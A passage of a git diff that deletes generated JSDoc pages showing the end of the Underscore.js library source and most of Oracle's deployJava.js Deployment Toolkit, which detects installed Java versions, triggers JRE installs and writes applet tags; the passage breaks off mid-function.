-      return !!(obj && _.has(obj, 'callee'));
-    };
-  }
-
-  // Is a given value a function?
-  _.isFunction = function(obj) {
-    return toString.call(obj) == '[object Function]';
-  };
-
-  // Is a given value a string?
-  _.isString = function(obj) {
-    return toString.call(obj) == '[object String]';
-  };
-
-  // Is a given value a number?
-  _.isNumber = function(obj) {
-    return toString.call(obj) == '[object Number]';
-  };
-
-  // Is a given object a finite number?
-  _.isFinite = function(obj) {
-    return _.isNumber(obj) && isFinite(obj);
-  };
-
-  // Is the given value `NaN`?
-  _.isNaN = function(obj) {
-    // `NaN` is the only value for which `===` is not reflexive.
-    return obj !== obj;
-  };
-
-  // Is a given value a boolean?
-  _.isBoolean = function(obj) {
-    return obj === true || obj === false || toString.call(obj) == '[object Boolean]';
-  };
-
-  // Is a given value a date?
-  _.isDate = function(obj) {
-    return toString.call(obj) == '[object Date]';
-  };
-
-  // Is the given value a regular expression?
-  _.isRegExp = function(obj) {
-    return toString.call(obj) == '[object RegExp]';
-  };
-
-  // Is a given value equal to null?
-  _.isNull = function(obj) {
-    return obj === null;
-  };
-
-  // Is a given variable undefined?
-  _.isUndefined = function(obj) {
-    return obj === void 0;
-  };
-
-  // Has own property?
-  _.has = function(obj, key) {
-    return hasOwnProperty.call(obj, key);
-  };
-
-  // Utility Functions
-  // -----------------
-
-  // Run Underscore.js in *noConflict* mode, returning the `_` variable to its
-  // previous owner. Returns a reference to the Underscore object.
-  _.noConflict = function() {
-    root._ = previousUnderscore;
-    return this;
-  };
-
-  // Keep the identity function around for default iterators.
-  _.identity = function(value) {
-    return value;
-  };
-
-  // Run a function **n** times.
-  _.times = function (n, iterator, context) {
-    for (var i = 0; i < n; i++) iterator.call(context, i);
-  };
-
-  // Escape a string for HTML interpolation.
-  _.escape = function(string) {
-    return (''+string).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#x27;').replace(/\//g,'&#x2F;');
-  };
-
-  // If the value of the named property is a function then invoke it;
-  // otherwise, return it.
-  _.result = function(object, property) {
-    if (object == null) return null;
-    var value = object[property];
-    return _.isFunction(value) ? value.call(object) : value;
-  };
-
-  // Add your own custom functions to the Underscore object, ensuring that
-  // they're correctly added to the OOP wrapper as well.
-  _.mixin = function(obj) {
-    each(_.functions(obj), function(name){
-      addToWrapper(name, _[name] = obj[name]);
-    });
-  };
-
-  // Generate a unique integer id (unique within the entire client session).
-  // Useful for temporary DOM ids.
-  var idCounter = 0;
-  _.uniqueId = function(prefix) {
-    var id = idCounter++;
-    return prefix ? prefix + id : id;
-  };
-
-  // By default, Underscore uses ERB-style template delimiters, change the
-  // following template settings to use alternative delimiters.
-  _.templateSettings = {
-    evaluate    : /<%([\s\S]+?)%>/g,
-    interpolate : /<%=([\s\S]+?)%>/g,
-    escape      : /<%-([\s\S]+?)%>/g
-  };
-
-  // When customizing `templateSettings`, if you don't want to define an
-  // interpolation, evaluation or escaping regex, we need one that is
-  // guaranteed not to match.
-  var noMatch = /.^/;
-
-  // Certain characters need to be escaped so that they can be put into a
-  // string literal.
-  var escapes = {
-    '\\': '\\',
-    "'": "'",
-    'r': '\r',
-    'n': '\n',
-    't': '\t',
-    'u2028': '\u2028',
-    'u2029': '\u2029'
-  };
-
-  for (var p in escapes) escapes[escapes[p]] = p;
-  var escaper = /\\|'|\r|\n|\t|\u2028|\u2029/g;
-  var unescaper = /\\(\\|'|r|n|t|u2028|u2029)/g;
-
-  // Within an interpolation, evaluation, or escaping, remove HTML escaping
-  // that had been previously added.
-  var unescape = function(code) {
-    return code.replace(unescaper, function(match, escape) {
-      return escapes[escape];
-    });
-  };
-
-  // JavaScript micro-templating, similar to John Resig's implementation.
-  // Underscore templating handles arbitrary delimiters, preserves whitespace,
-  // and correctly escapes quotes within interpolated code.
-  _.template = function(text, data, settings) {
-    settings = _.defaults(settings || {}, _.templateSettings);
-
-    // Compile the template source, taking care to escape characters that
-    // cannot be included in a string literal and then unescape them in code
-    // blocks.
-    var source = "__p+='" + text
-      .replace(escaper, function(match) {
-        return '\\' + escapes[match];
-      })
-      .replace(settings.escape || noMatch, function(match, code) {
-        return "'+\n_.escape(" + unescape(code) + ")+\n'";
-      })
-      .replace(settings.interpolate || noMatch, function(match, code) {
-        return "'+\n(" + unescape(code) + ")+\n'";
-      })
-      .replace(settings.evaluate || noMatch, function(match, code) {
-        return "';\n" + unescape(code) + "\n;__p+='";
-      }) + "';\n";
-
-    // If a variable is not specified, place data values in local scope.
-    if (!settings.variable) source = 'with(obj||{}){\n' + source + '}\n';
-
-    source = "var __p='';" +
-      "var print=function(){__p+=Array.prototype.join.call(arguments, '')};\n" +
-      source + "return __p;\n";
-
-    var render = new Function(settings.variable || 'obj', '_', source);
-    if (data) return render(data, _);
-    var template = function(data) {
-      return render.call(this, data, _);
-    };
-
-    // Provide the compiled function source as a convenience for build time
-    // precompilation.
-    template.source = 'function(' + (settings.variable || 'obj') + '){\n' +
-      source + '}';
-
-    return template;
-  };
-
-  // Add a "chain" function, which will delegate to the wrapper.
-  _.chain = function(obj) {
-    return _(obj).chain();
-  };
-
-  // The OOP Wrapper
-  // ---------------
-
-  // If Underscore is called as a function, it returns a wrapped object that
-  // can be used OO-style. This wrapper holds altered versions of all the
-  // underscore functions. Wrapped objects may be chained.
-  var wrapper = function(obj) { this._wrapped = obj; };
-
-  // Expose `wrapper.prototype` as `_.prototype`
-  _.prototype = wrapper.prototype;
-
-  // Helper function to continue chaining intermediate results.
-  var result = function(obj, chain) {
-    return chain ? _(obj).chain() : obj;
-  };
-
-  // A method to easily add functions to the OOP wrapper.
-  var addToWrapper = function(name, func) {
-    wrapper.prototype[name] = function() {
-      var args = slice.call(arguments);
-      unshift.call(args, this._wrapped);
-      return result(func.apply(_, args), this._chain);
-    };
-  };
-
-  // Add all of the Underscore functions to the wrapper object.
-  _.mixin(_);
-
-  // Add all mutator Array functions to the wrapper.
-  each(['pop', 'push', 'reverse', 'shift', 'sort', 'splice', 'unshift'], function(name) {
-    var method = ArrayProto[name];
-    wrapper.prototype[name] = function() {
-      var wrapped = this._wrapped;
-      method.apply(wrapped, arguments);
-      var length = wrapped.length;
-      if ((name == 'shift' || name == 'splice') && length === 0) delete wrapped[0];
-      return result(wrapped, this._chain);
-    };
-  });
-
-  // Add all accessor Array functions to the wrapper.
-  each(['concat', 'join', 'slice'], function(name) {
-    var method = ArrayProto[name];
-    wrapper.prototype[name] = function() {
-      return result(method.apply(this._wrapped, arguments), this._chain);
-    };
-  });
-
-  // Start chaining a wrapped Underscore object.
-  wrapper.prototype.chain = function() {
-    this._chain = true;
-    return this;
-  };
-
-  // Extracts the result from a wrapped and chained object.
-  wrapper.prototype.value = function() {
-    return this._wrapped;
-  };
-
-}).call(this);
-
-});
-
      -
      -
      - - - - -
      - - - -
      - -
      - Documentation generated by JSDoc 3.6.3 on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time) -
      - - - - - diff --git a/docs/lib_deployJava.js.html b/docs/lib_deployJava.js.html deleted file mode 100644 index f7c7a432c1..0000000000 --- a/docs/lib_deployJava.js.html +++ /dev/null @@ -1,1346 +0,0 @@ - - - - - JSDoc: Source: lib/deployJava.js - - - - - - - - - - -
      - -

      Source: lib/deployJava.js

      - - - - - - -
      -
      - 
      /*
- * Copyright (c) 2006, 2012, Oracle and/or its affiliates. All rights reserved.
- * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- *   - Redistributions of source code must retain the above copyright
- *     notice, this list of conditions and the following disclaimer.
- *
- *   - Redistributions in binary form must reproduce the above copyright
- *     notice, this list of conditions and the following disclaimer in the
- *     documentation and/or other materials provided with the distribution.
- *
- *   - Neither the name of Oracle nor the names of its
- *     contributors may be used to endorse or promote products derived
- *     from this software without specific prior written permission.
- *
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
- * IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
- * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER OR
- * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
- * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
- * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- */
-
-/*
- * deployJava.js
- *
- * This file is part of the Deployment Toolkit.  It provides functions for web
- * pages to detect the presence of a JRE, install the latest JRE, and easily run
- * applets or Web Start programs.  More Information on usage of the
- * Deployment Toolkit can be found in the Deployment Guide at:
- * http://docs.oracle.com/javase/6/docs/technotes/guides/jweb/index.html
- *
- * The "live" copy of this file may be found at :
- * http://java.com/js/deployJava.js.
- * For web pages provisioned using https, you may want to access the copy at:
- * https://java.com/js/deployJava.js.
- *
- * You are encouraged to link directly to the live copies.
- * The above files are stripped of comments and whitespace for performance,
- * You can access this file w/o the whitespace and comments removed at:
- * http://java.com/js/deployJava.txt.
- *
- */
-
-var deployJava = function() {
-    /** HTML attribute filter implementation */
-    var hattrs = {
-        core: [ 'id', 'class', 'title', 'style' ],
-        i18n: [ 'lang', 'dir' ],
-        events: [ 'onclick', 'ondblclick', 'onmousedown', 'onmouseup',
-            'onmouseover', 'onmousemove', 'onmouseout', 'onkeypress',
-            'onkeydown', 'onkeyup' ],
-        applet: [ 'codebase', 'code', 'name', 'archive', 'object',
-            'width', 'height', 'alt', 'align', 'hspace', 'vspace' ],
-        object: [ 'classid', 'codebase', 'codetype', 'data', 'type',
-            'archive', 'declare', 'standby', 'height', 'width', 'usemap',
-            'name', 'tabindex', 'align', 'border', 'hspace', 'vspace' ]
-    };
-
-    var object_valid_attrs = hattrs.object.concat(hattrs.core, hattrs.i18n,
-        hattrs.events);
-    var applet_valid_attrs = hattrs.applet.concat(hattrs.core);
-
-    // generic log function
-    function log(message) {
-        if ( ! rv.debug ) {return};
-        beef.debug(message);
-    }
-
-    //checks where given version string matches query
-    //
-    //NB: assume format is correct. Can add format check later if needed
-    // from dtjava.js
-    function versionCheckEx(query, version) {
-        if (query == null || query.length == 0) return true;
-
-        var c = query.charAt(query.length - 1);
-
-        //if it is not explicit pattern but does not have update version then need to append *
-        if (c != '+' && c != '*' && (query.indexOf('_') != -1 && c != '_')) {
-            query = query + "*";
-            c = '*';
-        }
-
-        query = query.substring(0, query.length - 1);
-        //if query ends with ".", "_" then we want to strip it to allow match of "1.6.*" to shorter form such as "1.6"
-        //TODO: add support for match of "1.7.0*" to "1.7"?
-        if (query.length > 0) {
-            var z = query.charAt(query.length - 1);
-            if (z == '.' || z == '_') {
-                query = query.substring(0, query.length - 1);
-            }
-        }
-        if (c == '*') {
-            //it is match if version starts from it
-            return (version.indexOf(query) == 0);
-        } else if (c == '+') {
-            //match if query string is lexicographically smaller
-            return query <= version;
-        }
-        return false;
-    }
-
-    function getWebStartLaunchIconURL() {
-        var imageUrl = '//java.com/js/webstart.png';
-        try {
-            // for http/https; use protocol less url; use http for all other protocol
-            return document.location.protocol.indexOf('http') != -1 ?
-                imageUrl : 'http:' + imageUrl;
-        } catch (err) {
-            return 'http:' + imageUrl;
-        }
-    }
-
-    // GetJava page
-    function constructGetJavaURL(query) {
-
-        var getJavaURL = 'http://java.com/dt-redirect';
-
-        if (query == null || query.length == 0) return getJavaURL;
-        if(query.charAt(0) == '&')
-        {
-            query = query.substring(1, query.length);
-        }
-        return getJavaURL + '?'+  query;
-    }
-
-    function arHas(ar, attr) {
-        var len = ar.length;
-        for (var i = 0; i < len; i++) {
-            if (ar[i] === attr) return true;
-        }
-        return false;
-    }
-
-    function isValidAppletAttr(attr) {
-        return arHas(applet_valid_attrs, attr.toLowerCase());
-    }
-
-    function isValidObjectAttr(attr) {
-        return arHas(object_valid_attrs, attr.toLowerCase());
-    }
-
-    /**
-     * returns true if we can enable DT plugin auto-install without chance of
-     * deadlock on cert mismatch dialog
-     *
-     * requestedJREVersion param is optional - if null, it will be
-     * treated as installing any JRE version
-     *
-     * DT plugin for 6uX only knows about JRE installer signed by SUN cert.
-     * If it encounter Oracle signed JRE installer, it will have chance of
-     * deadlock when running with IE.  This function is to guard against this.
-     */
-    function enableWithoutCertMisMatchWorkaround(requestedJREVersion) {
-
-        // Non-IE browser are okay
-        if ('MSIE' != deployJava.browserName) return true;
-
-        // if DT plugin is 10.0.0 or above, return true
-        // This is because they are aware of both SUN and Oracle signature and
-        // will not show cert mismatch dialog that might cause deadlock
-        if (deployJava.compareVersionToPattern(deployJava.getPlugin().version,
-            ["10", "0", "0"], false, true)) {
-            return true;
-        }
-
-        // If we got there, DT plugin is 6uX
-
-        if (requestedJREVersion  == null) {
-            // if requestedJREVersion is not defined - it means ANY.
-            // can not guarantee it is safe to install ANY version because 6uX
-            // DT does not know about Oracle certificates and may deadlock
-            return false;
-        }
-
-        // 6u32 or earlier JRE installer used Sun certificate
-        // 6u33+ uses Oracle's certificate
-        // DT in JRE6 does not know about Oracle certificate => can only
-        // install 6u32 or earlier without risk of deadlock
-        return !versionCheckEx("1.6.0_33+", requestedJREVersion);
-    }
-
-    /* HTML attribute filters */
-
-    var rv = {
-
-        debug: null,
-
-        /* version of deployJava.js */
-        version: "20120801",
-
-        firefoxJavaVersion: null,
-
-        myInterval: null,
-        preInstallJREList: null,
-        returnPage: null,
-        brand: null,
-        locale: null,
-        installType: null,
-
-        EAInstallEnabled: false,
-        EarlyAccessURL: null,
-
-
-        // mime-type of the DeployToolkit plugin object
-        oldMimeType: 'application/npruntime-scriptable-plugin;DeploymentToolkit',
-        mimeType: 'application/java-deployment-toolkit',
-
-        /* location of the Java Web Start launch button graphic is right next to
-         * deployJava.js at:
-         *    http://java.com/js/webstart.png
-         *
-         * Use protocol less url here for http/https support
-         */
-        launchButtonPNG: getWebStartLaunchIconURL(),
-
-        browserName: null,
-        browserName2: null,
-
-        /**
-         * Returns an array of currently-installed JRE version strings.
-         * Version strings are of the form #.#[.#[_#]], with the function returning
-         * as much version information as it can determine, from just family
-         * versions ("1.4.2", "1.5") through the full version ("1.5.0_06").
-         *
-         * Detection is done on a best-effort basis.  Under some circumstances
-         * only the highest installed JRE version will be detected, and
-         * JREs older than 1.4.2 will not always be detected.
-         */
-        getJREs: function() {
-            var list = new Array();
-            if (this.isPluginInstalled()) {
-                var plugin =  this.getPlugin();
-                var VMs = plugin.jvms;
-                for (var i = 0; i < VMs.getLength(); i++) {
-                    list[i] = VMs.get(i).version;
-                }
-            } else {
-                var browser = this.getBrowser();
-
-                if (browser == 'MSIE') {
-                    if (this.testUsingActiveX('1.7.0')) {
-                        list[0] = '1.7.0';
-                    } else if (this.testUsingActiveX('1.6.0')) {
-                        list[0] = '1.6.0';
-                    } else if (this.testUsingActiveX('1.5.0')) {
-                        list[0] = '1.5.0';
-                    } else if (this.testUsingActiveX('1.4.2')) {
-                        list[0] = '1.4.2';
-                    } else if (this.testForMSVM()) {
-                        list[0] = '1.1';
-                    }
-                } else if (browser == 'Netscape Family') {
-                    this.getJPIVersionUsingMimeType();
-                    if (this.firefoxJavaVersion != null) {
-                        list[0] = this.firefoxJavaVersion;
-                    } else if (this.testUsingMimeTypes('1.7')) {
-                        list[0] = '1.7.0';
-                    } else if (this.testUsingMimeTypes('1.6')) {
-                        list[0] = '1.6.0';
-                    } else if (this.testUsingMimeTypes('1.5')) {
-                        list[0] = '1.5.0';
-                    } else if (this.testUsingMimeTypes('1.4.2')) {
-                        list[0] = '1.4.2';
-                    } else if (this.browserName2 == 'Safari') {
-                        if (this.testUsingPluginsArray('1.7.0')) {
-                            list[0] = '1.7.0';
-                        } else if (this.testUsingPluginsArray('1.6')) {
-                            list[0] = '1.6.0';
-                        } else if (this.testUsingPluginsArray('1.5')) {
-                            list[0] = '1.5.0';
-                        } else if (this.testUsingPluginsArray('1.4.2')) {
-                            list[0] = '1.4.2';
-                        }
-                    }
-                }
-            }
-
-            if (this.debug) {
-                for (var i = 0; i < list.length; ++i) {
-                    log('[getJREs()] We claim to have detected Java SE ' + list[i]);
-                }
-            }
-
-            return list;
-        },
-
-        /**
-         * Triggers a JRE installation.  The exact effect of triggering an
-         * installation varies based on platform, browser, and if the
-         * Deployment Toolkit plugin is installed.
-         *
-         * The requestVersion string is of the form #[.#[.#[_#]]][+|*],
-         * which includes strings such as "1.4", "1.5.0*", and "1.6.0_02+".
-         * A star (*) means "any version starting within this family" and
-         * a plus (+) means "any version greater or equal to this".
-         * "1.5.0*" * matches 1.5.0_06 but not 1.6.0_01, whereas
-         * "1.5.0+" matches both.
-         *
-         * installCallback is an optional argument which holds a reference
-         * to a javascript callback function for reporting install status.
-         *
-         * If the Deployment Toolkit plugin is not present, this will just call
-         * this.installLatestJRE().
-         */
-        installJRE: function(requestVersion, installCallback) {
-            var ret = false;
-            if (this.isPluginInstalled() &&
-                this.isAutoInstallEnabled(requestVersion)) {
-                var installSucceeded = false;
-                if (this.isCallbackSupported()) {
-                    installSucceeded =
-                        this.getPlugin().installJRE(requestVersion, installCallback);
-                } else {
-                    installSucceeded = this.getPlugin().installJRE(requestVersion);
-                }
-
-                if (installSucceeded) {
-                    this.refresh();
-                    if (this.returnPage != null) {
-                        document.location = this.returnPage;
-                    }
-                }
-                return installSucceeded;
-            } else {
-                return this.installLatestJRE();
-            }
-        },
-
-        /**
-         * returns true if jre auto install for the requestedJREVersion is enabled
-         * for the local system; false otherwise
-         *
-         * requestedJREVersion param is optional - if not specified, it will be
-         * treated as installing any JRE version
-         *
-         * DT plugin for 6uX only knows about JRE installer signed by SUN cert.
-         * If it encounter Oracle signed JRE installer, it will have chance of
-         * deadlock when running with IE.  This function is to guard against this.
-         */
-        isAutoInstallEnabled: function(requestedJREVersion) {
-            // if no DT plugin, return false
-            if (!this.isPluginInstalled()) return false;
-
-            if (typeof requestedJREVersion  == 'undefined') {
-                requestedJREVersion = null;
-            }
-
-            return enableWithoutCertMisMatchWorkaround(requestedJREVersion);
-
-        },
-
-        /**
-         * returns true if jre install callback is supported
-         * callback support is added since dt plugin version 10.2.0 or above
-         */
-        isCallbackSupported: function() {
-            return this.isPluginInstalled() &&
-                this.compareVersionToPattern(this.getPlugin().version,
-                    ["10", "2", "0"], false, true);
-        },
-
-        /**
-         * Triggers a JRE installation.  The exact effect of triggering an
-         * installation varies based on platform, browser, and if the
-         * Deployment Toolkit plugin is installed.
-         *
-         * In the simplest case, the browser window will be redirected to the
-         * java.com JRE installation page, and (if possible) a redirect back to
-         * the current URL upon successful installation.  The return redirect is
-         * not always possible, as the JRE installation may require the browser to
-         * be restarted.
-         *
-         * installCallback is an optional argument which holds a reference
-         * to a javascript callback function for reporting install status.
-         *
-         * In the best case (when the Deployment Toolkit plugin is present), this
-         * function will immediately cause a progress dialog to be displayed
-         * as the JRE is downloaded and installed.
-         */
-        installLatestJRE: function(installCallback) {
-            if (this.isPluginInstalled() && this.isAutoInstallEnabled()) {
-                var installSucceeded = false;
-                if (this.isCallbackSupported()) {
-                    installSucceeded = this.getPlugin().installLatestJRE(installCallback);
-                } else {
-                    installSucceeded = this.getPlugin().installLatestJRE();
-                }
-                if (installSucceeded) {
-                    this.refresh();
-                    if (this.returnPage != null) {
-                        document.location = this.returnPage;
-                    }
-                }
-                return installSucceeded;
-            } else {
-                var browser = this.getBrowser();
-                var platform = navigator.platform.toLowerCase();
-                if ((this.EAInstallEnabled == 'true') &&
-                    (platform.indexOf('win') != -1) &&
-                    (this.EarlyAccessURL != null)) {
-
-                    this.preInstallJREList = this.getJREs();
-                    if (this.returnPage != null) {
-                        this.myInterval =
-                            setInterval("deployJava.poll()", 3000);
-                    }
-
-                    location.href = this.EarlyAccessURL;
-
-                    // we have to return false although there may be an install
-                    // in progress now, when complete it may go to return page
-                    return false;
-                } else {
-                    if (browser == 'MSIE') {
-                        return this.IEInstall();
-                    } else if ((browser == 'Netscape Family') &&
-                        (platform.indexOf('win32') != -1)) {
-                        return this.FFInstall();
-                    } else {
-                        location.href = constructGetJavaURL(
-                            ((this.returnPage != null) ?
-                                ('&returnPage=' + this.returnPage) : '') +
-                                ((this.locale != null) ?
-                                    ('&locale=' + this.locale) : '') +
-                                ((this.brand != null) ?
-                                    ('&brand=' + this.brand) : ''));
-                    }
-                    // we have to return false although there may be an install
-                    // in progress now, when complete it may go to return page
-                    return false;
-                }
-            }
-        },
-
-
-        /**
-         * Ensures that an appropriate JRE is installed and then runs an applet.
-         * minimumVersion is of the form #[.#[.#[_#]]], and is the minimum
-         * JRE version necessary to run this applet.  minimumVersion is optional,
-         * defaulting to the value "1.1" (which matches any JRE).
-         * If an equal or greater JRE is detected, runApplet() will call
-         * writeAppletTag(attributes, parameters) to output the applet tag,
-         * otherwise it will call installJRE(minimumVersion + '+').
-         *
-         * After installJRE() is called, the script will attempt to detect that the
-         * JRE installation has completed and begin running the applet, but there
-         * are circumstances (such as when the JRE installation requires a browser
-         * restart) when this cannot be fulfilled.
-         *
-         * As with writeAppletTag(), this function should only be called prior to
-         * the web page being completely rendered.  Note that version wildcards
-         * (star (*) and plus (+)) are not supported, and including them in the
-         * minimumVersion will result in an error message.
-         */
-        runApplet: function(attributes, parameters, minimumVersion) {
-            if (minimumVersion == 'undefined' || minimumVersion == null) {
-                minimumVersion = '1.1';
-            }
-
-            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
-
-            var matchData = minimumVersion.match(regex);
-
-            if (this.returnPage == null) {
-                // if there is an install, come back here and run the applet
-                this.returnPage = document.location;
-            }
-
-            if (matchData != null) {
-                var browser = this.getBrowser();
-                if (browser != '?') {
-                    if (this.versionCheck(minimumVersion + '+')) {
-                        this.writeAppletTag(attributes, parameters);
-                    } else if (this.installJRE(minimumVersion + '+')) {
-                        // after successful install we need to refresh page to pick
-                        // pick up new plugin
-                        this.refresh();
-                        location.href = document.location;
-                        this.writeAppletTag(attributes, parameters);
-                    }
-                } else {
-                    // for unknown or Safari - just try to show applet
-                    this.writeAppletTag(attributes, parameters);
-                }
-            } else {
-                log('[runApplet()] Invalid minimumVersion argument to runApplet():' +
-                    minimumVersion);
-            }
-        },
-
-
-        /**
-         * Outputs an applet tag with the specified attributes and parameters, where
-         * both attributes and parameters are associative arrays.  Each key/value
-         * pair in attributes becomes an attribute of the applet tag itself, while
-         * key/value pairs in parameters become <PARAM> tags.  No version checking
-         * or other special behaviors are performed; the tag is simply written to
-         * the page using document.writeln().
-         *
-         * As document.writeln() is generally only safe to use while the page is
-         * being rendered, you should never call this function after the page
-         * has been completed.
-         */
-        writeAppletTag: function(attributes, parameters) {
-            var startApplet = '<' + 'applet ';
-            var params = '';
-            var endApplet = '<' + '/' + 'applet' + '>';
-            var addCodeAttribute = true;
-
-            if (null == parameters || typeof parameters != 'object') {
-                parameters = new Object();
-            }
-
-            for (var attribute in attributes) {
-                if (! isValidAppletAttr(attribute)) {
-                    parameters[attribute] = attributes[attribute];
-                } else {
-                    startApplet += (' ' +attribute+ '="' +attributes[attribute] + '"');
-                    if (attribute == 'code') {
-                        addCodeAttribute = false;
-                    }
-                }
-            }
-
-            var codebaseParam = false;
-            for (var parameter in parameters) {
-                if (parameter == 'codebase_lookup') {
-                    codebaseParam = true;
-                }
-                // Originally, parameter 'object' was used for serialized
-                // applets, later, to avoid confusion with object tag in IE
-                // the 'java_object' was added.  Plugin supports both.
-                if (parameter == 'object' || parameter == 'java_object' ||
-                    parameter == 'java_code' ) {
-                    addCodeAttribute = false;
-                }
-                params += '<param name="' + parameter + '" value="' +
-                    parameters[parameter] + '"/>';
-            }
-            if (!codebaseParam) {
-                params += '<param name="codebase_lookup" value="false"/>';
-            }
-
-            if (addCodeAttribute) {
-                startApplet += (' code="dummy"');
-            }
-            startApplet += '>';
-
-            document.write(startApplet + '\n' + params + '\n' + endApplet);
-        },
-
-
-        /**
-         * Returns true if there is a matching JRE version currently installed
-         * (among those detected by getJREs()).  The versionPattern string is
-         * of the form #[.#[.#[_#]]][+|*], which includes strings such as "1.4",
-         * "1.5.0*", and "1.6.0_02+".
-         * A star (*) means "any version within this family" and a plus (+) means
-         * "any version greater or equal to the specified version".  "1.5.0*"
-         * matches 1.5.0_06 but not 1.6.0_01, whereas "1.5.0+" matches both.
-         *
-         * If the versionPattern does not include all four version components
-         * but does not end with a star or plus, it will be treated as if it
-         * ended with a star.  "1.5" is exactly equivalent to "1.5*", and will
-         * match any version number beginning with "1.5".
-         *
-         * If getJREs() is unable to detect the precise version number, a match
-         * could be ambiguous.  For example if getJREs() detects "1.5", there is
-         * no way to know whether the JRE matches "1.5.0_06+".  versionCheck()
-         * compares only as much of the version information as could be detected,
-         * so versionCheck("1.5.0_06+") would return true in in this case.
-         *
-         * Invalid versionPattern will result in a JavaScript error alert.
-         * versionPatterns which are valid but do not match any existing JRE
-         * release (e.g. "32.65+") will always return false.
-         */
-        versionCheck: function(versionPattern)
-        {
-            var index = 0;
-            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";
-
-            var matchData = versionPattern.match(regex);
-
-            if (matchData != null) {
-                // default is exact version match
-                // examples:
-                //    local machine has 1.7.0_04 only installed
-                //    exact match request is "1.7.0_05":  return false
-                //    family match request is "1.7.0*":   return true
-                //    minimum match request is "1.6+":    return true
-                var familyMatch = false;
-                var minMatch = false;
-
-                var patternArray = new Array();
-
-                for (var i = 1; i < matchData.length; ++i) {
-                    // browser dependency here.
-                    // Fx sets 'undefined', IE sets '' string for unmatched groups
-                    if ((typeof matchData[i] == 'string') && (matchData[i] != '')) {
-                        patternArray[index] = matchData[i];
-                        index++;
-                    }
-                }
-
-                if (patternArray[patternArray.length-1] == '+') {
-                    // + specified in request - doing a minimum match
-                    minMatch = true;
-                    familyMatch = false;
-                    patternArray.length--;
-                } else if (patternArray[patternArray.length-1] == '*') {
-                    // * specified in request - doing a family match
-                    minMatch = false;
-                    familyMatch = true;
-                    patternArray.length--;
-                } else if (patternArray.length < 4) {
-                    // versionPattern does not include all four version components
-                    // and does not end with a star or plus, it will be treated as
-                    // if it ended with a star. (family match)
-                    minMatch = false;
-                    familyMatch = true;
-                }
-
-                var list = this.getJREs();
-                for (var i = 0; i < list.length; ++i) {
-                    if (this.compareVersionToPattern(list[i], patternArray,
-                        familyMatch, minMatch)) {
-                        return true;
-                    }
-                }
-
-                return false;
-            } else {
-                var msg = 'Invalid versionPattern passed to versionCheck: ' +
-                    versionPattern;
-                log('[versionCheck()] ' + msg);
-                alert(msg);
-                return false;
-            }
-        },
-
-
-        /**
-         * Returns true if an installation of Java Web Start of the specified
-         * minimumVersion can be detected.  minimumVersion is optional, and
-         * if not specified, '1.4.2' will be used.
-         * (Versions earlier than 1.4.2 may not be detected.)
-         */
-        isWebStartInstalled: function(minimumVersion) {
-
-            var browser = this.getBrowser();
-            if (browser == '?') {
-                // we really don't know - better to try to use it than reinstall
-                return true;
-            }
-
-            if (minimumVersion == 'undefined' || minimumVersion == null) {
-                minimumVersion = '1.4.2';
-            }
-
-            var retval = false;
-            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
-            var matchData = minimumVersion.match(regex);
-
-            if (matchData != null) {
-                retval = this.versionCheck(minimumVersion + '+');
-            } else {
-                log('[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): ' + minimumVersion);
-                retval = this.versionCheck('1.4.2+');
-            }
-            return retval;
-        },
-
-        // obtain JPI version using navigator.mimeTypes array
-        // if found, set the version to this.firefoxJavaVersion
-        getJPIVersionUsingMimeType: function() {
-            // Walk through the full list of mime types.
-            for (var i = 0; i < navigator.mimeTypes.length; ++i) {
-                var s = navigator.mimeTypes[i].type;
-                // The jpi-version is the plug-in version.  This is the best
-                // version to use.
-                var m = s.match(/^application\/x-java-applet;jpi-version=(.*)$/);
-                if (m != null) {
-                    this.firefoxJavaVersion = m[1];
-                    // Opera puts the latest sun JRE last not first
-                    if ('Opera' != this.browserName2) {
-                        break;
-                    }
-                }
-            }
-        },
-
-        // launch the specified JNLP application using the passed in jnlp file
-        // the jnlp file does not need to have a codebase
-        // this requires JRE 7 or above to work
-        // if machine has no JRE 7 or above, we will try to auto-install and then launch
-        // (function will return false if JRE auto-install failed)
-        launchWebStartApplication: function(jnlp) {
-            var uaString = navigator.userAgent.toLowerCase();
-
-            this.getJPIVersionUsingMimeType();
-
-            // make sure we are JRE 7 or above
-            if (this.isWebStartInstalled('1.7.0') == false) {
-
-                // perform latest JRE auto-install
-                if ((this.installJRE('1.7.0+') == false) ||
-                    ((this.isWebStartInstalled('1.7.0') == false))) {
-                    return false;
-                }
-            }
-
-            var jnlpDocbase = null;
-
-            // use document.documentURI for docbase
-            if (document.documentURI) {
-                jnlpDocbase = document.documentURI;
-            }
-
-            // fallback to document.URL if documentURI not available
-            if (jnlpDocbase == null) {
-                jnlpDocbase = document.URL;
-            }
-
-            var browser = this.getBrowser();
-
-            var launchTag;
-
-            if (browser == 'MSIE') {
-
-                launchTag = '<' +
